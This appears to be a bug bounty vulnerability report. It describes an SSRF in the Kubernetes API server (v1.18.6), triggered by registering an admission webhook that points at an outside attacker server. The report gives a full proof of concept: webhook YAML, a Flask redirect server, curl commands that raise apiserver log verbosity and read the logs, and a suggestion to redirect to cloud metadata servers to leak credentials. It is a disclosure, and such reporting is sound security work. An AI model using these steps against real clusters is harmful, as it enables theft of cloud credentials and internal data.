Report Submission Form
attacker can create admissionwebhook cause ssrf in cloudprovider server.
cloudprovider like GKE AKS EKS.
kubernetes v1.18.6
Docker version 19.03.6, build 369ce74a3c
minikube start --vm-driver=none --kubernetes-version='v1.18.6'
2.edit kube-apiserver
options in following path.
/etc/kubernetes/manifests/kube-apiserver.yaml
add some options to spec.containers.command field. see pic1
--log-dir=/var/log
--logtostderr=false
{F920720}
3.save following yaml file to disk as poc1.yaml, and run command kubectl create poc1.yaml
.
poc1.yaml
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
name: test.config.xxx.io
webhooks:
- name: test.config.xxx.io
rules:
- apiGroups: [""]
apiVersions: ["v1", "v1beta1"]
operations: ["CREATE","DELETE","UPDATE"]
resources: ["serviceaccounts"]
scope: "*"
clientConfig:
# modify with your poc2 webserver
url: "https://lazydog.me/aa"
# if webserver using self-signed certificate must be add caBundle
# caBundle: ""
admissionReviewVersions: ["v1", "v1beta1"]
sideEffects: None
timeoutSeconds: 5
4.use pip install Flask
to install flask deps, and run FLASK_ENV=development FLASK_APP=poc1 flask run
. if you using self-signed certificate must be add --cert PATH --key PATH
arguments to command.
from flask import Flask, redirect, request, Response
app = Flask(__name__)
app.port = 80
@app.route('/<path:path>', methods=['POST','GET'])
def index(path=''):
resp = ''
print(request.headers)
if path == 'test':
res = Response("test")
res.headers["Content-Type"] = "application/vnd.kubernetes.protobuf"
return res
return redirect('http://www.tencent.com/')
5.use kubectl proxy &
start a apiserver proxy to localhost,and set klog
level to 10. if not set klog level to 10 is can only recv http failed code response body.
curl -XPUT --data "10" http://localhost:8001/debug/flags/v
6.now we can create a serviceaccount let apiserver to request our evil webserver use this command kubectl create sa testpoc
.
{F920762}
7.use curl http://localhost:8001/logs/kube-apiserver.INFO
to find full response body, is may be include Response Body:
strings.
{F920768}
I think this case is like CVE-2020–8555
, attacker can cause a full response body ssrf in cloudprovider inner server.
if redirect url is metadata server maybe can leak some credentials or other sensitive information.